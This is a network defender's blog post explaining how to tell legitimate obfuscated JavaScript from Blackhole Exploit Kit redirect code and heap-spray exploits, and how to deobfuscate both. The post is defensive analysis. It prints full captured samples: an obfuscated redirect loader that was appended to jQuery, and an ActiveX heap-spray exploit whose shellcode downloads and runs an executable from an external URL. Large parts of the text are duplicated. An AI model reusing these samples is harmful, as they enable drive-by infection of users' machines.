Often times, malware enters your network through your clients. One of the most prevalent attack vectors is through browser vulnerabilities. These are usually manifested in malicious JavaScript that aims to either redirect the browser to malicious website that is hosting exploit code or an exploit itself. The Blackhole Exploit Kit has been making the news and flooding non-malicious but exploitable websites with redirect code through obfuscated JavaScript that will cause your web browser to be redirected through a series of other websites that determine your software versions and serve you the appropriate exploit for your system. This is all automated and can be deployed by non-technical attackers.
But what does "obfuscated" really mean? For me, if I can't tell just by looking at it what it is trying to do, then it is obfuscated. As a network defender, I've encountered my share of obfuscated JavaScript. It is important to note that there are legitimate reasons for having obfuscated JavaScript on your website (saving bandwidth, hiding proprietor code, etc). This post aims to highlight the key differences between legitimate, redirecting and malicious obfuscated JavaScript code and demonstrate quick ways to analyze and ferret out what is what.
LEGITIMATE CODE
There is no real substitute to experience. If you are looking at obfuscated JavaScript and you are a network defender, your first instinct is to distrust it. Over time, the legitimacy of the code will stand out and the unusual ones will become more and more obvious. But, we can start with the easy ones.
Yahoo and Google make up a lot of the JavaScript code out there. jQuery, undoubtedly one of the more popular JavaScript frameworks is served straight from Google. Sure, some websites download a particular version and host it for their own use, but the smart website coder would rather point to Google's hosting of jQuery for a number of reasons. Saving bandwidth and automatic updating are just some of the reasons. Yahoo also serves up several JavaScript frameworks, including the Yahoo User Interface (YUI). JavaScript that is served by Yahoo and Google can generally be trusted. After reviewing several samples over the wire, it becomes easy to see the patterns.
But it is important to know that exploit kits such the Blackhole Exploit Kit (BEK) automatically add their malicious code to multiple files on vulnerable websites. BEK code tends to stick out since it does not match the general pattern of other JavaScript frameworks. It tends to consume only a few, albeit long, lines of code and usually has large amount of what appear to be meaningless numbers or letters followed by a decoding sequence. I've seen my share of YUI and jQuery libraries with BEK JavaScript code appended or pre-pended to it.
In short, trust some sources, but not the frameworks.
REDIRECT CODE
JavaScript that redirects will usually go through several layers of obfuscation. The structure generally tends to look like this:
Some testing code
Large array of numbers or letters
De-obfuscation loops
Execution code
The last line, execution code, described JavaScript execution, such as "eval" or some obfuscated version of it. As with legitimate code, over time, you can easily identify redirecting code based on the structure and the layouts.
Consider this bit of code that was appended to the end of an otherwise legit copy of the jQuery JavaScript library v1.4.4:
EXPLOIT CODE
JavaScript exploits are usually Heap Spray attacks. They throw the payload all over the heap and then exploit the vulnerable components of JavaScript, hoping to change EIP to their exploit code and thus executing the payload. There are a couple of things about JavaScript exploits that tend to stick out: they use NOPs (see below) and cannot obfuscate the payload. Note that this does not mean the code is not obfuscated. It may go through several iterations before actually attempting to render the payload in memory, but when it is rendered, it cannot be obfuscated itself. In other words, it will stick out.
NOP SLEDS
NOP (Null OPeration) is an assembly command that does nothing. If an attacker has placed his payload, which contains assembly commands, in memory, but is not sure exactly where it is in memory, she may pad the beginning of the payload with NOP commands (0x90) so if the instruction pointer (EIP) is changed to the general location, the target system will execute NOP commands until it hits the main payload. This increases the chances of the payload being executed, especially if the attacker is not sure where the exploit code is in memory, as is the case with Heap Spray attacks.
Here is an example of a malicious JavaScript with a payload, attempting to exploit a vulnerable ActiveX component:
UNOBFUSCATING
The lovely thing about scripting languages is that they execute regardless of the environment. Unlike executable malware analysis, you can take Javascript code and run it in any environment and it will run, as long as certain dependencies are met. Luckily, there are a lot of tools available for doing just this. One of my favorite is called Malzilla (http://malzilla.sourceforge.net/). Malzilla is a Windows based tool that can not only execute Javascript, it can also re-format, debug and analyze the resulting "stuff" that it generates.
Let's take the first example above of redirecting JavaScript. First, we fire up Malzilla and paste the code into the "Decoder" tab of Malzilla. Ensure that the "Replace eval() with" is selected and then hit the "Format Code" button. This will give us something more readable.
We can do a quick review of the code in this script and identify the logic structures. The "if" statement starting on the third line will execute if it is in a browser environment and it also does a little math test as an additional test. We can change the code a little to ferret out what we really want to find out: what is this code trying to do? Also, the "for" loop in the bottom is a decoding loop, building the variable "s". Finally, the last line is actually an "eval" against the "z" variable, which is a copy of "s", done in the second to last line. Finally, we can change the last "eval" to a "document.write":
When we run this, we find code that will redirect the web browser to http[:]//a7ot8.tlpvqsltnh.is-lost.org/g/", which when this code was captured was a starting point for a Blackhole Exploit Kit (BEK) attack.
ATTACK PAYLOAD
Now, let's look at the second example we have: a direct JavaScript exploit. Remember, these exploits can come with multiple obfuscations, but the final attack payload cannot be obfuscated. I've seen JavaScript attacks that go through multiple rounds of obfuscations before revealing the final payload and attack. So you may need to rinse and repeat until you get to the bottom of a JavaScript attack.
In the example above, we can quickly identify the payload since it begins with a NOP sled: "%u9090%u9090" and completely ignore the rest of the script. A quick Google of "DirectAnimation.PathControl" shows that this is most likely an exploit against CVE-2006-4446 (sorry, this is an old sample). But let's focus on the payload to figure out what an infected system would do:
For this, we can use a variety of tools or even scripting. The key point to remember is that this is machine code and is intended to be run directly in memory by redirecting EIP to the NOP sled in the beginning and then execute the rest of instructions. Another thing to remember is that JavaScript uses a least significant bit (LSB) unicode format, which for our purposes means that we swap the byte pairs (i.e. change u3574 to u7435). You can do this in your favorite scripting language. You can also use Malzilla's "Misc Decoders" tab for this. Me, I like awk, so I do sloppy things like this with the payload (after removing the unescape wrapper):
In any case, you should have something like this in the end:
Now, you can convert the hex strings to binary in any number of ways. Here's a quick way to do this with xxd and hexdump (assuming you have the above text in file /tmp/payload.hex):
xxd -r -ps /tmp/payload.hex | hexdump -Cv
The output should look like this:
00000000 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
00000010 90 90 90 90 eb 54 8b 75 3c 8b 74 35 78 03 f5 56 |.....T.u<.t5x..V|
00000020 8b 76 20 03 f5 33 c9 49 41 ad 33 db 36 0f be 14 |.v ..3.IA.3.6...|
00000030 28 38 f2 74 08 c1 cb 0d 03 da 40 eb ef 3b df 75 |(8.t......@..;.u|
00000040 e7 5e 8b 5e 24 03 dd 66 8b 0c 4b 8b 5e 1c 03 dd |.^.^$..f..K.^...|
00000050 8b 04 8b 03 c5 c3 75 72 6c 6d 6f 6e 2e 64 6c 6c |......urlmon.dll|
00000060 00 43 3a 5c 55 2e 65 78 65 00 33 c0 64 03 40 30 |.C:\U.exe.3.d.@0|
00000070 78 0c 8b 40 0c 8b 70 1c ad 8b 40 08 eb 09 8b 40 |x..@..p...@....@|
00000080 34 8d 40 7c 8b 40 3c 95 bf 8e 4e 0e ec e8 84 ff |4.@|.@<...N.....|
00000090 ff ff 83 ec 04 83 2c 24 3c ff d0 95 50 bf 36 1a |......,$<...P.6.|
000000a0 2f 70 e8 6f ff ff ff 8b 54 24 fc 8d 52 ba 33 db |/p.o....T$..R.3.|
000000b0 53 53 52 eb 24 53 ff d0 5d bf 98 fe 8a 0e e8 53 |SSR.$S..]......S|
000000c0 ff ff ff 83 ec 04 83 2c 24 62 ff d0 bf 7e d8 e2 |.......,$b...~..|
000000d0 73 e8 40 ff ff ff 52 ff d0 e8 d7 ff ff ff 68 74 |s.@...R.......ht|
000000e0 74 70 3a 2f 2f 6d 70 33 2e 72 65 61 6c 69 7a 65 |tp://mp3.realize|
000000f0 2e 68 6b 2f 6c 6f 67 69 6e 2f 69 6e 64 65 78 2e |.hk/login/index.|
00000100
After examining the output, regardless of how you do it, we find the following strings, including a URL that is used for a secondary download:
IN CLOSING
When you can quickly produce these types of results to your network defenders, it goes a long way to detecting and preventing infections on your network.
Thanks for reading and hopefully you've found this post informative. If there are topics you would like to see in the future, please drop us a line.
But what does "obfuscated" really mean? For me, if I can't tell just by looking at it what it is trying to do, then it is obfuscated. As a network defender, I've encountered my share of obfuscated JavaScript. It is important to note that there are legitimate reasons for having obfuscated JavaScript on your website (saving bandwidth, hiding proprietor code, etc). This post aims to highlight the key differences between legitimate, redirecting and malicious obfuscated JavaScript code and demonstrate quick ways to analyze and ferret out what is what.
LEGITIMATE CODE
There is no real substitute to experience. If you are looking at obfuscated JavaScript and you are a network defender, your first instinct is to distrust it. Over time, the legitimacy of the code will stand out and the unusual ones will become more and more obvious. But, we can start with the easy ones.
Yahoo and Google make up a lot of the JavaScript code out there. jQuery, undoubtedly one of the more popular JavaScript frameworks is served straight from Google. Sure, some websites download a particular version and host it for their own use, but the smart website coder would rather point to Google's hosting of jQuery for a number of reasons. Saving bandwidth and automatic updating are just some of the reasons. Yahoo also serves up several JavaScript frameworks, including the Yahoo User Interface (YUI). JavaScript that is served by Yahoo and Google can generally be trusted. After reviewing several samples over the wire, it becomes easy to see the patterns.
But it is important to know that exploit kits such the Blackhole Exploit Kit (BEK) automatically add their malicious code to multiple files on vulnerable websites. BEK code tends to stick out since it does not match the general pattern of other JavaScript frameworks. It tends to consume only a few, albeit long, lines of code and usually has large amount of what appear to be meaningless numbers or letters followed by a decoding sequence. I've seen my share of YUI and jQuery libraries with BEK JavaScript code appended or pre-pended to it.
In short, trust some sources, but not the frameworks.
REDIRECT CODE
JavaScript that redirects will usually go through several layers of obfuscation. The structure generally tends to look like this:
Some testing code
Large array of numbers or letters
De-obfuscation loops
Execution code
The last line, execution code, described JavaScript execution, such as "eval" or some obfuscated version of it. As with legitimate code, over time, you can easily identify redirecting code based on the structure and the layouts.
Consider this bit of code that was appended to the end of an otherwise legit copy of the jQuery JavaScript library v1.4.4:
c=3-1;i=c-2;if(window.document)if(parseInt("0"+"1"+"2"+"3")===83)try{Boolean().prototype.q}catch(egewgsd){f=['0i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i78i57i74i-8i77i74i68i-8i21i-8i-1i64i76i76i72i18i7i7i57i15i71i76i16i6i76i68i72i78i73i75i68i76i70i64i6i65i75i5i68i71i75i76i6i71i74i63i7i63i7i-1i19i-27i-30i-31i65i62i-8i0i76i81i72i61i71i62i-8i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i21i21i-8i-1i77i70i60i61i62i65i70i61i60i-1i1i-8i83i-27i-30i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i8i19i-27i-30i-31i85i-27i-30i-31i60i71i59i77i69i61i70i76i6i71i70i69i71i77i75i61i69i71i78i61i-8i21i-8i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i-31i65i62i-8i0i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i21i21i-8i8i1i-8i83i-27i-30i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i9i19i-27i-30i-31i-31i-31i78i57i74i-8i64i61i57i60i-8i21i-8i60i71i59i77i69i61i70i76i6i63i61i76i29i68i61i69i61i70i76i75i26i81i44i57i63i38i57i69i61i0i-1i64i61i57i60i-1i1i51i8i53i19i-27i-30i-31i-31i-31i78i57i74i-8i75i59i74i65i72i76i-8i21i-8i60i71i59i77i69i61i70i76i6i59i74i61i57i76i61i29i68i61i69i61i70i76i0i-1i75i59i74i65i72i76i-1i1i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i76i81i72i61i-8i21i-8i-1i76i61i80i76i7i66i57i78i57i75i59i74i65i72i76i-1i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i71i70i74i61i57i60i81i75i76i57i76i61i59i64i57i70i63i61i-8i21i-8i62i77i70i59i76i65i71i70i-8i0i1i-8i83i-27i-30i-31i-31i-31i-31i65i62i-8i0i76i64i65i75i6i74i61i57i60i81i43i76i57i76i61i-8i21i21i-8i-1i59i71i69i72i68i61i76i61i-1i1i-8i83i-27i-30i-31i-31i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i10i19i-27i-30i-31i-31i-31i-31i85i-27i-30i-31i-31i-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i71i70i68i71i57i60i-8i21i-8i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i10i19i-27i-30i-31i-31i-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i75i74i59i-8i21i-8i77i74i68i-8i3i-8i37i57i76i64i6i74i57i70i60i71i69i0i1i6i76i71i43i76i74i65i70i63i0i1i6i75i77i58i75i76i74i65i70i63i0i11i1i-8i3i-8i-1i6i66i75i-1i19i-27i-30i-31i-31i-31i64i61i57i60i6i57i72i72i61i70i60i27i64i65i68i60i0i75i59i74i65i72i76i1i19i-27i-30i-31i-31i85i-27i-30i-31i85i19i-27i-30i85i1i0i1i19'][0].split('i');v="ev"+"a"+"l";}if(v)e=window[v];w=f;s=[];r=String;for(;689!=i;i+=1){j=i;s+=r["fr"+"omC"+"harCode"](w[j]*1+40);}if(f)z=s;e(z); |
EXPLOIT CODE
JavaScript exploits are usually Heap Spray attacks. They throw the payload all over the heap and then exploit the vulnerable components of JavaScript, hoping to change EIP to their exploit code and thus executing the payload. There are a couple of things about JavaScript exploits that tend to stick out: they use NOPs (see below) and cannot obfuscate the payload. Note that this does not mean the code is not obfuscated. It may go through several iterations before actually attempting to render the payload in memory, but when it is rendered, it cannot be obfuscated itself. In other words, it will stick out.
NOP SLEDS
NOP (Null OPeration) is an assembly command that does nothing. If an attacker has placed his payload, which contains assembly commands, in memory, but is not sure exactly where it is in memory, she may pad the beginning of the payload with NOP commands (0x90) so if the instruction pointer (EIP) is changed to the general location, the target system will execute NOP commands until it hits the main payload. This increases the chances of the payload being executed, especially if the attacker is not sure where the exploit code is in memory, as is the case with Heap Spray attacks.
Here is an example of a malicious JavaScript with a payload, attempting to exploit a vulnerable ActiveX component:
function second() var yuwergufiudf = 0x0F0F0F0F; var vhusdifsdifdbwfbsdf = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u54EB %u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE %u3828%u74F2%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B%u0324%u66DD%u0C8B %u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A %u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0840%u09EB %u408B%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304%u242C %uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u8BFF%u2454%u8DFC%uBA52%uDB33%u5353 %uEB52%u5324%uD0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF %u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u7468%u7074%u2F3A%u6D2F %u3370%u722E%u6165%u696C%u657A%u682E%u2F6B%u6F6C%u6967%u2F6E%u6E69%u6564%u2E78 %u6870%u3F70%u6572%u3D67%u0001"); var uyywifssdfdsf = 0x400000; var afddssddsfsdfxc = vhusdifsdifdbwfbsdf.length * 2; var erwfrhhrhfgSize = uyywifssdfdsf - (afddssddsfsdfxc+0x38); var erwfrhhrhfg = unescape("%u0D0D%u0D0D"); erwfrhhrhfg = retyttyuty(erwfrhhrhfg,erwfrhhrhfgSize); iusdiuiudfsd = (yuwergufiudf - 0x400000)/uyywifssdfdsf; memory = new Array(); for (i=0;i<iusdiuiudfsd;i++) { memory[i] = erwfrhhrhfg + vhusdifsdifdbwfbsdf; } var target = new ActiveXObject("DirectAnimation.PathControl"); target.KeyFrame(0x40000E0A, new Array(1), new Array(1)); } |
UNOBFUSCATING
The lovely thing about scripting languages is that they execute regardless of the environment. Unlike executable malware analysis, you can take Javascript code and run it in any environment and it will run, as long as certain dependencies are met. Luckily, there are a lot of tools available for doing just this. One of my favorite is called Malzilla (http://malzilla.sourceforge.net/). Malzilla is a Windows based tool that can not only execute Javascript, it can also re-format, debug and analyze the resulting "stuff" that it generates.
Let's take the first example above of redirecting JavaScript. First, we fire up Malzilla and paste the code into the "Decoder" tab of Malzilla. Ensure that the "Replace eval() with" is selected and then hit the "Format Code" button. This will give us something more readable.
c=3-1;
i=c-2;
if(window.document)if(parseInt("0"+"1"+"2"+"3")===83)try
{
Boolean().prototype.q
}
catch(egewgsd)
{
f=['0i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i78i57i74i-8i77i74i68i-8i21i-8i-1i64i76i76i72i18i7i7i57i15i71i76i16i6i76i68i72i78i73i75i68i76i70i64i6i65i75i5i68i71i75i76i6i71i74i63i7i63i7i-1i19i-27i-30i-31i65i62i-8i0i76i81i72i61i71i62i-8i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i21i21i-8i-1i77i70i60i61i62i65i70i61i60i-1i1i-8i83i-27i-30i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i8i19i-27i-30i-31i85i-27i-30i-31i60i71i59i77i69i61i70i76i6i71i70i69i71i77i75i61i69i71i78i61i-8i21i-8i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i-31i65i62i-8i0i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i21i21i-8i8i1i-8i83i-27i-30i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i9i19i-27i-30i-31i-31i-31i78i57i74i-8i64i61i57i60i-8i21i-8i60i71i59i77i69i61i70i76i6i63i61i76i29i68i61i69i61i70i76i75i26i81i44i57i63i38i57i69i61i0i-1i64i61i57i60i-1i1i51i8i53i19i-27i-30i-31i-31i-31i78i57i74i-8i75i59i74i65i72i76i-8i21i-8i60i71i59i77i69i61i70i76i6i59i74i61i57i76i61i29i68i61i69i61i70i76i0i-1i75i59i74i65i72i76i-1i1i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i76i81i72i61i-8i21i-8i-1i76i61i80i76i7i66i57i78i57i75i59i74i65i72i76i-1i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i71i70i74i61i57i60i81i75i76i57i76i61i59i64i57i70i63i61i-8i21i-8i62i77i70i59i76i65i71i70i-8i0i1i-8i83i-27i-30i-31i-31i-31i-31i65i62i-8i0i76i64i65i75i6i74i61i57i60i81i43i76i57i76i61i-8i21i21i-8i-1i59i71i69i72i68i61i76i61i-1i1i-8i83i-27i-30i-31i-31i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i10i19i-27i-30i-31i-31i-31i-31i85i-27i-30i-31i-31i-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i71i70i68i71i57i60i-8i21i-8i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i10i19i-27i-30i-31i-31i-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i75i74i59i-8i21i-8i77i74i68i-8i3i-8i37i57i76i64i6i74i57i70i60i71i69i0i1i6i76i71i43i76i74i65i70i63i0i1i6i75i77i58i75i76i74i65i70i63i0i11i1i-8i3i-8i-1i6i66i75i-1i19i-27i-30i-31i-31i-31i64i61i57i60i6i57i72i72i61i70i60i27i64i65i68i60i0i75i59i74i65i72i76i1i19i-27i-30i-31i-31i85i-27i-30i-31i85i19i-27i-30i85i1i0i1i19'][0].split('i');
v="ev"+"a"+"l";
}
if(v)e=window[v];
w=f;
s=[];
r=String;
for(;689!=i;i+=1)
{
j=i;
s+=r["fr"+"omC"+"harCode"](w[j]*1+40);
}
if(f)z=s;
e(z);
i=c-2;
if(window.document)if(parseInt("0"+"1"+"2"+"3")===83)try
{
Boolean().prototype.q
}
catch(egewgsd)
{
f=['0i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i78i57i74i-8i77i74i68i-8i21i-8i-1i64i76i76i72i18i7i7i57i15i71i76i16i6i76i68i72i78i73i75i68i76i70i64i6i65i75i5i68i71i75i76i6i71i74i63i7i63i7i-1i19i-27i-30i-31i65i62i-8i0i76i81i72i61i71i62i-8i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i21i21i-8i-1i77i70i60i61i62i65i70i61i60i-1i1i-8i83i-27i-30i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i8i19i-27i-30i-31i85i-27i-30i-31i60i71i59i77i69i61i70i76i6i71i70i69i71i77i75i61i69i71i78i61i-8i21i-8i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i-31i65i62i-8i0i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i21i21i-8i8i1i-8i83i-27i-30i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i9i19i-27i-30i-31i-31i-31i78i57i74i-8i64i61i57i60i-8i21i-8i60i71i59i77i69i61i70i76i6i63i61i76i29i68i61i69i61i70i76i75i26i81i44i57i63i38i57i69i61i0i-1i64i61i57i60i-1i1i51i8i53i19i-27i-30i-31i-31i-31i78i57i74i-8i75i59i74i65i72i76i-8i21i-8i60i71i59i77i69i61i70i76i6i59i74i61i57i76i61i29i68i61i69i61i70i76i0i-1i75i59i74i65i72i76i-1i1i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i76i81i72i61i-8i21i-8i-1i76i61i80i76i7i66i57i78i57i75i59i74i65i72i76i-1i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i71i70i74i61i57i60i81i75i76i57i76i61i59i64i57i70i63i61i-8i21i-8i62i77i70i59i76i65i71i70i-8i0i1i-8i83i-27i-30i-31i-31i-31i-31i65i62i-8i0i76i64i65i75i6i74i61i57i60i81i43i76i57i76i61i-8i21i21i-8i-1i59i71i69i72i68i61i76i61i-1i1i-8i83i-27i-30i-31i-31i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i10i19i-27i-30i-31i-31i-31i-31i85i-27i-30i-31i-31i-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i71i70i68i71i57i60i-8i21i-8i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i10i19i-27i-30i-31i-31i-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i75i74i59i-8i21i-8i77i74i68i-8i3i-8i37i57i76i64i6i74i57i70i60i71i69i0i1i6i76i71i43i76i74i65i70i63i0i1i6i75i77i58i75i76i74i65i70i63i0i11i1i-8i3i-8i-1i6i66i75i-1i19i-27i-30i-31i-31i-31i64i61i57i60i6i57i72i72i61i70i60i27i64i65i68i60i0i75i59i74i65i72i76i1i19i-27i-30i-31i-31i85i-27i-30i-31i85i19i-27i-30i85i1i0i1i19'][0].split('i');
v="ev"+"a"+"l";
}
if(v)e=window[v];
w=f;
s=[];
r=String;
for(;689!=i;i+=1)
{
j=i;
s+=r["fr"+"omC"+"harCode"](w[j]*1+40);
}
if(f)z=s;
e(z);
We can do a quick review of the code in this script and identify the logic structures. The "if" statement starting on the third line will execute if it is in a browser environment and it also does a little math test as an additional test. We can change the code a little to ferret out what we really want to find out: what is this code trying to do? Also, the "for" loop in the bottom is a decoding loop, building the variable "s". Finally, the last line is actually an "eval" against the "z" variable, which is a copy of "s", done in the second to last line. Finally, we can change the last "eval" to a "document.write":
c=3-1;i=c-2;
f=['0i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i78i57i74i-8i77i74i68i-8i21i-8i-1i64i76i76i72i18i7i7i57i15i71i76i16i6i76i68i72i78i73i75i68i76i70i64i6i65i75i5i68i71i75i76i6i71i74i63i7i63i7i-1i19i-27i-30i-31i65i62i-8i0i76i81i72i61i71i62i-8i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i21i21i-8i-1i77i70i60i61i62i65i70i61i60i-1i1i-8i83i-27i-30i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i8i19i-27i-30i-31i85i-27i-30i-31i60i71i59i77i69i61i70i76i6i71i70i69i71i77i75i61i69i71i78i61i-8i21i-8i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i-31i65i62i-8i0i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i21i21i-8i8i1i-8i83i-27i-30i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i9i19i-27i-30i-31i-31i-31i78i57i74i-8i64i61i57i60i-8i21i-8i60i71i59i77i69i61i70i76i6i63i61i76i29i68i61i69i61i70i76i75i26i81i44i57i63i38i57i69i61i0i-1i64i61i57i60i-1i1i51i8i53i19i-27i-30i-31i-31i-31i78i57i74i-8i75i59i74i65i72i76i-8i21i-8i60i71i59i77i69i61i70i76i6i59i74i61i57i76i61i29i68i61i69i61i70i76i0i-1i75i59i74i65i72i76i-1i1i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i76i81i72i61i-8i21i-8i-1i76i61i80i76i7i66i57i78i57i75i59i74i65i72i76i-1i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i71i70i74i61i57i60i81i75i76i57i76i61i59i64i57i70i63i61i-8i21i-8i62i77i70i59i76i65i71i70i-8i0i1i-8i83i-27i-30i-31i-31i-31i-31i65i62i-8i0i76i64i65i75i6i74i61i57i60i81i43i76i57i76i61i-8i21i21i-8i-1i59i71i69i72i68i61i76i61i-1i1i-8i83i-27i-30i-31i-31i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i10i19i-27i-30i-31i-31i-31i-31i85i-27i-30i-31i-31i-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i71i70i68i71i57i60i-8i21i-8i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i10i19i-27i-30i-31i-31i-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i75i74i59i-8i21i-8i77i74i68i-8i3i-8i37i57i76i64i6i74i57i70i60i71i69i0i1i6i76i71i43i76i74i65i70i63i0i1i6i75i77i58i75i76i74i65i70i63i0i11i1i-8i3i-8i-1i6i66i75i-1i19i-27i-30i-31i-31i-31i64i61i57i60i6i57i72i72i61i70i60i27i64i65i68i60i0i75i59i74i65i72i76i1i19i-27i-30i-31i-31i85i-27i-30i-31i85i19i-27i-30i85i1i0i1i19'][0].split('i');
v="ev"+"a"+"l";
if(v)e=window[v];
w=f;
s=[];
r=String;
for(;689!=i;i+=1)
{
j=i;
s+=r["fr"+"omC"+"harCode"](w[j]*1+40);
}
if(f)z=s;
//e(z);
document.write(z);
v="ev"+"a"+"l";
if(v)e=window[v];
w=f;
s=[];
r=String;
for(;689!=i;i+=1)
{
j=i;
s+=r["fr"+"omC"+"harCode"](w[j]*1+40);
}
if(f)z=s;
//e(z);
document.write(z);
When we run this, we find code that will redirect the web browser to http[:]//a7ot8.tlpvqsltnh.is-lost.org/g/", which when this code was captured was a starting point for a Blackhole Exploit Kit (BEK) attack.
ATTACK PAYLOAD
Now, let's look at the second example we have: a direct JavaScript exploit. Remember, these exploits can come with multiple obfuscations, but the final attack payload cannot be obfuscated. I've seen JavaScript attacks that go through multiple rounds of obfuscations before revealing the final payload and attack. So you may need to rinse and repeat until you get to the bottom of a JavaScript attack.
In the example above, we can quickly identify the payload since it begins with a NOP sled: "%u9090%u9090" and completely ignore the rest of the script. A quick Google of "DirectAnimation.PathControl" shows that this is most likely an exploit against CVE-2006-4446 (sorry, this is an old sample). But let's focus on the payload to figure out what an infected system would do:
%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A%u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304%u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u8BFF%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u7468%u7074%u2F3A%u6D2F%u3370%u722E%u6165%u696C%u657A%u682E%u2F6B%u6F6C%u6967%u2F6E%u6E69%u6564%u2E78%u6870%u3F70%u6572%u3D67%u0001
For this, we can use a variety of tools or even scripting. The key point to remember is that this is machine code and is intended to be run directly in memory by redirecting EIP to the NOP sled in the beginning and then execute the rest of instructions. Another thing to remember is that JavaScript uses a least significant bit (LSB) unicode format, which for our purposes means that we swap the byte pairs (i.e. change u3574 to u7435). You can do this in your favorite scripting language. You can also use Malzilla's "Misc Decoders" tab for this. Me, I like awk, so I do sloppy things like this with the payload (after removing the unescape wrapper):
awk 'gsub("%u"," ") { x=1; while(x<=NF) { printf "0x" substr($x,3,2) ",0x" substr($x,1,2) ","; x++; } }'
In any case, you should have something like this in the end:
